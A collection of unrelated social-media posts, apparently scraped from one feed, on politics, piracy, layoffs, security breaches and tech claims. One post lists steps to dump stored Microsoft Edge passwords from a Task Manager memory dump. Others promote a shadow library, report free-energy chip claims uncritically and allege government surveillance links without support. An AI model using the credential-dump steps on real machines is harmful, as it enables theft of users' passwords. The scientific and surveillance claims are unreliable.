On the back cover of Lucy Connolly's ghost written book the lying starts with the claim that she sent one tweet, and that it was figurative hyperbole. Your regular reminder this isn't true. 1. Her own counsel said she intended to incite serious violence - it succeeded. 2. It was viewed 310,000 times on her feed, and reposted 940 times before she deleted it. 3. Not content with making the money she got from her go fund me she's now going to profit from her criminality with this 'book' 4. She has already made more money from that tweet, mostly tax free, than she earned in the previous ten years. When they sideshow her at their conferences, Reform & Connolly always claim her conviction was an example of 'two tier justice' - perhaps they're talking about how much she's 'earned' from it? The Judge's sentencing remarks ⬇️

An anonymous developer built a library so big it made Elsevier's legal team cry. It's called Anna's Archive. This got 99 million books and papers. Every shadow library on earth mirrored and searchable in one place. Domain takedowns bounce off it. It just moves to a new URL and keeps going. Here's the story behind it. In November 2022, US law enforcement seized Z-Library's domains and arrested its operators. The largest ebook library on the internet was gone overnight. A pseudonymous developer going only by "Anna" had already seen it coming. She had spent months as part of an anonymous group called the Pirate Library Mirror, quietly making full copies of every major shadow library before they disappeared. When Z-Library fell, she had the entire thing backed up. Days later, Anna's Archive went live. Here's what makes it unkillable. It does not host a single file. It indexes metadata and links to third-party mirrors. Legally, there is nothing to seize. Technically, there is no central server to shut down. The entire codebase is open source. The entire dataset is distributed via torrents and IPFS, a decentralized file system where data lives across thousands of nodes simultaneously. If every domain gets blocked tomorrow, anyone can spin up a new mirror in minutes from the same data. Italy blocked it. Germany blocked it. Publishers sued it. The US Trade Representative put it on their notorious markets list. It added new domains and kept going. What you get for free: → 99M books and academic papers → Sci-Hub, Library Genesis, Z-Library, Internet Archive all mirrored in one search → No account required → No subscription → Download via IPFS, torrent, or direct link → Works across multiple mirror domains when one goes down Elsevier charges universities $2 billion a year for journal access. A single anonymous developer with a pseudonym and a backup drive just made that business model look embarrassing. 100% Opensource. annas-archive.gl

pov: you're Vasilios Syrakis you spent 8 years building the infrastructure that powers Jira, Confluence, Bitbucket for 350,000 companies > you designed Envoy control planes from scratch > you deployed 2,000 proxy servers across 13 AWS regions > you wrote auth containers in Rust > you moved every Atlassian product behind a centralized edge then one morning you get the email "to self-fund AI investment" so you sit down, hit record, and spend 38 minutes explaining every system you built for free because you no longer have a reason to stay quiet

In Harold "Sonny" White's own words: x.com/i/status/2054191557109…

Okay folks, this qualifies as BREAKING NEWS! Harold “Sonny” White, the warp drive pioneer behind NASA’s EagleWorks Lab, just stepped out of stealth with Casimir Inc. to unveil MicroSPARC: the first battery free chip to harvest continuous electrical power straight from the quantum vacuum via the Casimir force. The 5 mm × 5 mm device uses millions of custom microscale Casimir cavities fabricated on a substrate. Inside each cavity, two fixed conductive walls create a region of negative vacuum pressure (the well known Casimir effect). Stationary micropillars anchored in the middle act as antennas. Electrons from the cavity walls then quantum tunnel to the pillars because the interior is a lower energy “quieter” zone — and the probability of tunneling back is orders of magnitude lower. This one way “quantum ratchet” flow generates a measurable DC current with no external power source or moving parts. Prototypes already fabricated at university nanofab facilities (Texas A&M AggieFab, MIT.nano) have been tested in RF-shielded, low noise chambers for weeks. The team reports outputs ranging from millivolts to volts at picoamp to microamp levels using precision electrometers and Kelvin Probe Force Microscopy. Target performance for the first commercial chip: ~1.5 V at 25 µA (≈40 µW continuous). Stacking and scaling could reach milliwatts or even watts per device. Initial applications are ultra low power: always on IoT sensors, wearables, and medical implants. Longer term roadmap includes trickle charging phones, powering small electronics, and eventually grid independent homes or EVs. Commercialization is targeted for 2028, starting at ~$100/W before dropping toward $10/W. White ties the work directly to his earlier theoretical paper on emergent quantization from a dynamic vacuum and sees it as a practical power source for the deep-space missions he’s long championed. Extraordinary claims require extraordinary evidence, and independent scientists have so far declined public comment. But if the engineering scales as hoped, MicroSPARC would represent a genuine paradigm shift: continuous, maintenance free power drawn from the fabric of spacetime itself. A bold leap from warp-drive theory into real hardware. Progress (and vacuum-powered chips) marches on. Photo: MicroSPARC | Casimir Inc. Source: thedebrief.org/free-energy-f…

Katie Hopkins just had a lesson, where she was taught that freedom of speech is seldom accompanied by freedom from consequences, if what is said goes against the law. Enjoy.

‼️🚨 Microsoft calls this "intended behaviour," so here we go. How to dump the credentials of every user stored in Microsoft Edge: 1. Open Edge. Don't browse anywhere, just open it. 2. Flip to Task Manager, find Edge, expand the task. 3. Highlight the "browser" sub-task, right-click, and choose "Create Memory Dump." 4. Open the dump file and look for credentials. The logged-in Windows user can dump every stored Edge credential with no additional rights. Which means any malware that user executes has those credentials for the asking. Thanks to Rob VandenBrink at SANS: isc.sans.edu/diary/32954

Vi segnalo un ottimo articolo scritto dalla mia amica Claudia. Uno spaccato di Roma non banale, nerd, è vero come un film neorealista in bianco e nero. substack.com/profile/8435063…

Fuck. I haven’t used them in ages, but if those two softwares are compromised, literally nothing is safe to run today. I should spin my sandbox 24/7 and test every executable from now on 😂

Per chi fosse interessato/a, la Sentenza Tribunale di Roma / Movimento Consumatori vs. @NetflixIT 🔗 movimentoconsumatori.it/imag…

A company that sells cybersecurity risk intelligence to 91% of Fortune 100 companies just got breached through an unpatched React app and a single overprivileged AWS role. LexisNexis. 3.9 million records. 400,000 user profiles. 53 secrets extracted in plaintext from AWS Secrets Manager. Including credentials for production databases, Salesforce, Oracle, and analytics platforms. The password "Lexis1234" was reused across five different internal systems. This is a company that describes itself as "one of the largest protectors of private and confidential data in the world." They provide risk intelligence to 7,500 US government agencies, nine out of ten banks, and major insurers globally. They sell cybersecurity assessments to their customers. And they couldn't secure their own AWS account. Here's what makes this worse than a typical breach: - The compromised data includes accounts tied to 118 .gov email domains. Three US federal judges. Four Department of Justice attorneys. SEC staff. Probation officers. Federal court law clerks. The attackers published doxxed profiles of federal officials tied to courts and regulatory agencies across the country. - These aren't random consumer records. These are the digital identities of people whose exposure carries national security implications. A compromised federal judge's profile doesn't just enable identity theft - it enables targeted influence operations, blackmail, and intelligence gathering. The attack path is textbook and that's the problem: → Unpatched React application - the front door → Single ECS task role with read access to every secret in the account - the keys to everything → 536 Redshift tables, 430 database tables, full VPC infrastructure mapping - complete visibility → 53 secrets in plaintext including database credentials, API tokens, and development access keys No zero-day. No advanced persistent threat. No nation-state capability required. Basic hygiene failures — unpatched app, overprivileged IAM role, password reuse, plaintext secrets. This is LexisNexis's second confirmed breach in two years. The December 2024 incident exposed 364,000 individuals through a compromised corporate account on a third-party development platform. Data brokers and analytics providers are not peripheral players - they're deeply embedded in today's risk landscape. That's the pattern we keep seeing. Attack the aggregator, not the individual. BPO providers. Cloud platforms. Legal data giants. The organisations that hold everyone else's data are the highest-value targets - and often the weakest links. For every enterprise that uses LexisNexis services: → Assume your metadata, contract details, and product usage history are exposed → Watch for targeted phishing using the exposed business relationship data → If your staff have LexisNexis accounts, reset credentials immediately → Ask your vendor risk team: when was the last time we assessed LexisNexis's actual security posture - not their marketing, their controls? The company that indexes the world's legal information couldn't index its own IAM policies. And they're not the exception. They're the pattern. More info: cybernews.com/security/lexis…

🚨 Someone just turned your WiFi router into a full-body surveillance system. No cameras. No wearables. No video. Just radio waves. It's called RuView. It uses the WiFi signals already in your room to detect human poses, track breathing, measure heart rate, and see through walls. Not a concept. Not a research paper. Working code you can run right now. Here's what this thing actually does: → Tracks full 17-point body pose using only WiFi signals → Detects breathing rate (6-30 BPM) without touching anyone → Measures heart rate (40-120 BPM) from across the room → Sees through walls, furniture, and debris up to 5 meters deep → Tracks multiple people simultaneously with zero identity swaps → Self-learns from raw WiFi data. No labeled datasets needed Here's how it works: WiFi signals pass through your room and hit the human body. The body scatters those signals differently based on position, breathing, even heartbeat. RuView reads that scattering pattern and reconstructs everything. A mesh of 4 ESP32 nodes ($48 total) gives you 360-degree coverage with 12 measurement links, 20 Hz updates, and sub-30mm precision. Here's the wildest part: It has a disaster response mode called WiFi-Mat. It detects survivors trapped under rubble through concrete walls, classifies injury severity using START triage protocol, and estimates 3D position. The kind of tool that saves lives after earthquakes. The Rust implementation processes 54,000 frames per second. That's 810x faster than the Python version. The entire Docker image is 132 MB. The AI model fits in 55 KB of memory. Runs on an $8 ESP32 chip. Train once, deploy in any room. No retraining. No recalibration. 1,100 tests. SHA-256 verified capability audit. 22.4K GitHub stars. 2.7K forks. MIT License. 100% Open Source.

Peak tech humour.

Fuck sake. OpenClaw is basically the worst security flaw you can have on your digital life. It’s an STDI in binary form.

> be nerds > look into persona (used by discord) > kyc (know your customer) service > used for age verification > search on internet (shodan) > find weird server > image 1 > openai-watchlistdb.withpersona > openai-watchlistdb-testing.withpersona > lolwtf > look inside > supposed to be behind cloudflare to hide ip > openai messed up > not behind cloudflare > real ip shown > using google cloud > lookup cert history > 2023-11-16 created > 2024-02-28 gets cert > 2024-03-04 prod goes live > google stuff > openai and persona partners > partner around timeline of certs > back to searching stuff > find withpersona-gov > look inside > okta (image 2) > lolwtf > look inside > website accidentally leaking stuff > fedramp-private-backend-api > look inside > api .js accidentally exposed > look inside > wtf "SARInstructionsCard" > wtf "app.onyx.withpersona-gov" > wtf "FINTRAC" > wtf "PrivatePartnershipProjectNameCodes" > image 3 > wtf "AsyncSelfie" > look inside > openai, persona, send data to us gov > feds map face to financial records > map face using AI > map face to ICE stuff > api stores data for lots of stuff > image 4 tl;dr persona kyc and openai are frens, using your selfie for verification and sending to ICE (or USGOV in general), using AI to tie to your financial records. see subsequent post for full write-up. its long and not mobile friendly

NEW –> DEF CON has banned Vincenzo Iozzo, Joichi Ito and Pablos Holman after DOJ files released in January revealed their roles in efforts to secure Jeffrey Epstein’s access to the popular hacker conference: nextgov.com/people/2026/02/d…

Just being sent this by a woman I’m seeing. I think she’s the one 😂

Il #gaming mi riguarda da vicino: anni negli #esports con QLASH prima e Reply Totem dopo, mi hanno portato a vedere le cose in modo meno edulcorato. Torno a parlare di #Ubisoft e di quello che accade, tra rumors e vulnerabilità. linkedin.com/pulse/ubisoft-t…

Benvenuti nei nuovi #CallCenter. La norma che si prefiggeva (a parole) di sconfiggere il fenomeno dei call center è stata abilmente aggirata e trasformata in opportunità per affinare la profilazione del database in uso. Dal blog di Christian Bernieri. 🔗 garantepiracy.it/blog/pillol…

"RemoveWindowsAI" is a script created by zoicware, available on GitHub, that does exactly what it says: it remove every AI feature in Windows 11. Do what you wish to do with this information. github.com/zoicware/RemoveWi…